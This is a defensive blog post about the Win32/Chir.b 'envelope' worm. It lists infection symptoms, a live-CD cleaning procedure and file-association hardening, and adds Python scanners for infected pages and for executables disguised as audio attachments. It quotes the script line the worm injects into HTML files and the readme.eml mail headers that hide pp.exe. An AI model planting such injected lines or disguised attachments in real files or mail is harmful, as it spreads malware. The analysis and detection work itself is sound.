Virus win32chir.b /worm (the envelope virus)

I will briefly revisit / review the virus named worm win32/chir.b.

This virus is very dangerous and destructive to documents, even if not directly. It is a file-infector virus that infects exe, scr, htm, html… files, so when we open a document (for example Word, Excel, PowerPoint), the document that has just been opened gets damaged, because the application used to open that document has itself been infected. And until now there is no way to restore such a document to normal…

Advice: never open your documents on a computer that is infected with the win32/chir.b virus if you do not want your documents damaged / lost.

Symptoms of an infected computer:

  1. Many applications cannot be run / executed, or run but are sluggish / slow and do not work properly.
  2. There will be many files with an envelope / e-mail icon; looked at closely, they are named readme.eml and appear in almost every folder.
  3. Every htm / html file, when opened in Notepad, shows it has been infected: several lines of script like the following have been appended:

<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>

  4. Opening a browser (Firefox, for example) is followed by readme.eml opening, because readme.eml also contains HTML script that runs JavaScript, which can launch the infector contained inside readme.eml, namely pp.exe.
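An added example (not from the original post, and not the author's tool): a small Python scanner that turns symptoms 2 and 3 above into a check. It walks a directory tree, reports every readme.eml it finds and every .htm/.html file carrying the appended window.open("readme.eml") line, and can strip repeated copies of that line from a page. The sample tree it builds is constructed for the demonstration.

```python
import os
import re
import tempfile

# Marker the worm appends to .htm/.html pages (taken from the post); the
# regex tolerates quote/whitespace variants and matches each repeated copy.
INFECTION_RE = re.compile(
    r'<html>\s*<script\s+language=["\']?JavaScript["\']?>\s*'
    r'window\.open\(\s*["\']readme\.eml["\']\s*,\s*null\s*,\s*["\'][^"\']*["\']\s*\)'
    r'\s*</script>\s*</html>[ \t]*\r?\n?',
    re.IGNORECASE,
)
WEB_EXTS = {".htm", ".html"}
DROPPER_NAME = "readme.eml"
# Constructed copy of the appended line, used by demo() below.
SAMPLE_MARKER = ('<html><script language="JavaScript">window.open("readme.eml", '
                 'null,"resizable=no,top=6000,left=6000")</script></html>\n')

def is_infected_html(text):
    """True when the appended window.open("readme.eml") marker is present."""
    return INFECTION_RE.search(text) is not None

def strip_infection(text):
    """Remove every copy of the appended marker; returns (cleaned_text, copies)."""
    return INFECTION_RE.subn("", text)

def scan_tree(root):
    """Walk a directory tree; list infected web pages and dropped readme.eml files."""
    report = {"infected_html": [], "droppers": []}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if name.lower() == DROPPER_NAME:
                report["droppers"].append(path)
            elif os.path.splitext(name)[1].lower() in WEB_EXTS:
                with open(path, "r", encoding="latin-1", errors="replace") as fh:
                    if is_infected_html(fh.read()):
                        report["infected_html"].append(path)
    return report

def demo():
    """Constructed sample tree: one clean page, one page hit twice, one dropper."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "docs"))
    with open(os.path.join(root, "index.html"), "w", encoding="ascii") as fh:
        fh.write("<html><body>hello</body></html>\n")
    with open(os.path.join(root, "docs", "page.htm"), "w", encoding="ascii") as fh:
        fh.write("<html><body>report</body></html>\n" + SAMPLE_MARKER * 2)
    with open(os.path.join(root, "docs", "readme.eml"), "w", encoding="ascii") as fh:
        fh.write("constructed placeholder, not the real dropper\n")
    return scan_tree(root)
```

Run demo() to see the report for the constructed tree; on a real system, point scan_tree() at a drive root after the executables have been cleaned, as step 5 of the cleaning procedure describes.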

How to deal with / clean the win32/chir.b virus:

  1. Because Win32/chir.b is a file infector, every file that is opened / started is automatically infected, so it is almost impossible to clean it from an already infected system. It is like washing clothes in dirty water… So the safest way is to use a Windows XP live CD / the Mini Windows XP found on Hiren's Boot CD.
  2. After choosing to boot from the Hiren CD, select Mini Windows XP and wait until Windows XP appears. Note that a minimum of 512 MB of RAM is needed for the scan to run normally.
  3. Scan with the latest NOD32 stand-alone, downloaded on a computer that is not infected with the virus.
  4. Scan all drives / partitions; from experience, choose the action option clean >>> delete. The cleaner will then clean the infected files (exe, scr) and delete the readme.eml files.
  5. After everything has been scanned, restart the computer and scan it with an antivirus that can detect infected htm / html files, because even though the virus is gone, the infected htm files remain a nuisance: every htm file that is opened will also open / execute readme.eml.
  6. I use antivirus products based on the ClamAV database, for example ClamWin, or ClamAV for Windows, or PCMAV combined with ClamAV. Or another antivirus you rely on… 🙂

Just for information:

  1. The readme.eml file:
HELO btamail.net.cn
MAIL FROM: imissyou@btamail.net.cn
RCPT TO:
DATA
FROM: SERVER@yahoo.com
TO:
SUBJECT: SERVER is comming!
MIME-Version: 1.0
Content-type: multipart/mixed; boundary="#BOUNDARY#"

--#BOUNDARY#
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable

--#BOUNDARY#
MIME-Version: 1.0
Content-Type: audio/x-wav; name="pp.exe"
Content-Transfer-Encoding: base64
Content-id: THE-CID


What is unique about this virus is that it combines several techniques: 1. html / htm (opened by the browser), 2. eml (opened by Outlook Express), 3. scr (screen saver), 4. exe (application), 5. Autorun.inf (Windows autorun).

  2. Almost every computer that is not maintained / configured with stricter settings will be infected by this virus immediately.
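An added example (not part of the original post, and not the author's or any vendor's tool): a Python check for the MIME trick the readme.eml headers above show, namely the pp.exe attachment declared as audio/x-wav. The sample message reuses the header lines quoted above; its recipient address and the attachment body (a harmless "MZ" stub) are constructed placeholders, not the real payload.

```python
import base64
from email import message_from_string
from email import policy

# Constructed stand-in for the attachment body: the two-byte "MZ" DOS/PE
# signature followed by zeros. It is NOT the worm's pp.exe.
STUB_PAYLOAD = b"MZ" + b"\x00" * 62
# Message body rebuilt from the headers quoted in the post (SMTP envelope
# lines omitted); the recipient is a placeholder.
SAMPLE_EML = (
    "FROM: SERVER@yahoo.com\r\n"
    "TO: recipient@example.invalid\r\n"
    "SUBJECT: SERVER is comming!\r\n"
    "MIME-Version: 1.0\r\n"
    "Content-type: multipart/mixed; boundary=\"#BOUNDARY#\"\r\n"
    "\r\n"
    "--#BOUNDARY#\r\n"
    "Content-Type: text/html\r\n"
    "Content-Transfer-Encoding: quoted-printable\r\n"
    "\r\n"
    "<html><body>constructed body</body></html>\r\n"
    "--#BOUNDARY#\r\n"
    "MIME-Version: 1.0\r\n"
    "Content-Type: audio/x-wav; name=\"pp.exe\"\r\n"
    "Content-Transfer-Encoding: base64\r\n"
    "Content-id: THE-CID\r\n"
    "\r\n"
    + base64.b64encode(STUB_PAYLOAD).decode() + "\r\n"
    "--#BOUNDARY#--\r\n"
)

EXEC_EXTS = (".exe", ".scr", ".pif", ".com", ".bat")

def find_disguised_executables(raw):
    """Return findings for attachments whose declared media type hides an executable."""
    msg = message_from_string(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        name = (part.get_filename() or "").lower()   # Content-Type name= or filename=
        ctype = part.get_content_type()
        payload = part.get_payload(decode=True) or b""
        reasons = []
        if name.endswith(EXEC_EXTS) and not ctype.startswith("application/"):
            reasons.append("executable name %s declared as %s" % (name, ctype))
        if payload[:2] == b"MZ":
            reasons.append("decoded payload starts with the MZ executable signature")
        if reasons:
            findings.append({"name": name, "content_type": ctype,
                             "content_id": str(part.get("Content-id")),
                             "reasons": reasons})
    return findings
```

A mail gateway or a mailbox sweep can apply the same two tests to every part; the media-type mismatch alone already identifies this dropper without relying on a signature for pp.exe.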

Tips & tricks:

To keep our computer safe from various viruses, there are several settings we should apply, so that a virus is not executed immediately:

  1. Change the file association for eml to txtfile: "assoc eml=txtfile". Purpose: if readme.eml is executed, it opens in Notepad.
  2. Change the file association for htm / html to txtfile: "assoc htm=txtfile", "assoc html=txtfile". Purpose: an infected htm file, when executed, no longer calls readme.eml directly; if an htm file does not contain the script shown above and we want to open it, we can use Open With: Internet Explorer or another browser.
  3. Change the file association for js, jse, vbs, vbe, wsf to txtfile, so that any js or vbs script opens in Notepad.
  4. If an e-mail or the readme.eml file gets executed, never click the pp.exe file (the attachment), because that file is the infector for exe files.
  5. htm / html files infected by this virus are detected by ClamAV / ClamWin as htm.nimda; this shows that the virus author updated / refined / reused the strengths of the NIMDA virus in infecting victims' computers.

Once again I remind you: clean your computer of the win32/chir.b virus before you open your documents, if you want them to stay safe and undamaged…

About Mpu-Elcom

My prayer, my worship, my life and my death I dedicate to Allah, Lord of the universe...

5 replies to Virus win32chir.b /worm (the envelope virus)

  1. Teresita Engelke says:

    Many thanks for the great posting. I am glad I have taken the time to see this.

  2. john says:

    This is a really good read for me. Must admit that you are one of the best bloggers I ever saw. Thanks for posting this informative article.

  3. Stacy Breutzmann says:

    This weblog appears to get a great deal of visitors. How do you promote it? It offers a nice unique spin on things. I guess having something authentic or substantial to say is the most important thing.

  4. The most annoying virus: every time it is deleted it comes back… what is a good removal tool for it?

  5. Mpu-Elcom says:

    @pranantabalicarrental: the Win32 chir.b virus can be cleaned using the RMCHIR tool; download it and save it as a rar archive on a virus-free computer, then it can be used to clean specifically the chir worm (readme.eml).
